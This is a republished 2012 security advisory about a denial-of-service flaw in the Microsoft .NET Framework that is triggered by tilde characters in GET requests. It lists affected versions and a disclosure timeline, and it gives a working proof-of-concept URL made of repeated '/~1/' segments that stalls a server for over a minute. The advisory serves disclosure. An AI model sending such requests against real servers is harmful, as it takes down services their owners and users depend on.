首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
.Net Framework Tilde Character DoS
来源:http://soroush.secproject.com/blog/ 作者:Research 发布时间:2012-07-10  
Security Research - .Net Framework Tilde Character DoS
 
 
Website : http://soroush.secproject.com/blog/
 
 
 
I. BACKGROUND
---------------------
 
"The .NET Framework is a software framework developed by Microsoft that runs primarily on Microsoft Windows.
It includes a large library and provides language interoperability
across several programming languages." (Wikipedia)
 
II. DESCRIPTION
---------------------
 
Vulnerability Research Team discovered a  vulnerability
in Microsoft .NET Framework.
 
The vulnerability is caused by a tilde character "~" in a Get request, which could allow remote attackers
to Deny the functionality of the server.
 
 
III. AFFECTED PRODUCTS
---------------------------
 
.Net Framework 1.0 Windows XP
.Net Framework 1.1 Windows 2003
.Net Framework 2.0 Windows 2003 R2
.Net Framework 3.0 Windows 2008
.Net Framework 3.5 Windows 2008 R2
.Net Framework 4.0 Windows 2008 R2,Windows 7
 
 
IV. Binary Analysis & Exploits/PoCs
---------------------------------------
 
In-depth technical analysis of the vulnerability and a functional exploit
are available through:
 
http://soroush.secproject.com/blog/2012/06/microsoft-iis-tilde-character-vulnerabilityfeature-short-filefolder-name-disclosure/
 
Example:
Loading time (less than 5 seconds):
http://server/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A.aspx
 
 
Loading time (long time - more than a minute):
http://server/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1/~1.AsPx
 
 
 
V. SOLUTION
----------------
 
There are still workarounds through Vendor and security vendors.
 
VI. CREDIT
--------------
 
This vulnerability was discovered by:
 
Soroush Dalili (@irsdl)
Ali Abbasnejad
 
 
VII. REFERENCES
----------------------
 
http://support.microsoft.com/kb/142982/en-us
http://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/
 
VIII. DISCLOSURE TIMELINE
-----------------------------
 
2010-08-01 - Vulnerability Discovered
2010-08-03 - Vendor Informed
2010-12-01 - Vendor 1st Response
2011-01-04 - Vendor 2nd Response (next version fix)
2012-06-29 - Public Disclosure

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Shakes And Fidget - Brute Forc
·Solar FTP Server 2.2 Remote DO
·Poison Ivy 2.3.2 C&C Server Bu
·Python Untrusted Search Path/C
·Umbraco CMS Remote Command Exe
·AdminStudio LaunchHelp.dll Act
·Tiki Wiki <= 8.3 unserialize()
·Check Point Abra Bypass / Comm
·Basilic 1.5.14 diff.php Arbitr
·Apache Sling 2.1.0 Denial Of S
·Linux Kernel Local Denial Of S
·Java Applet Field Bytecode Ver
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved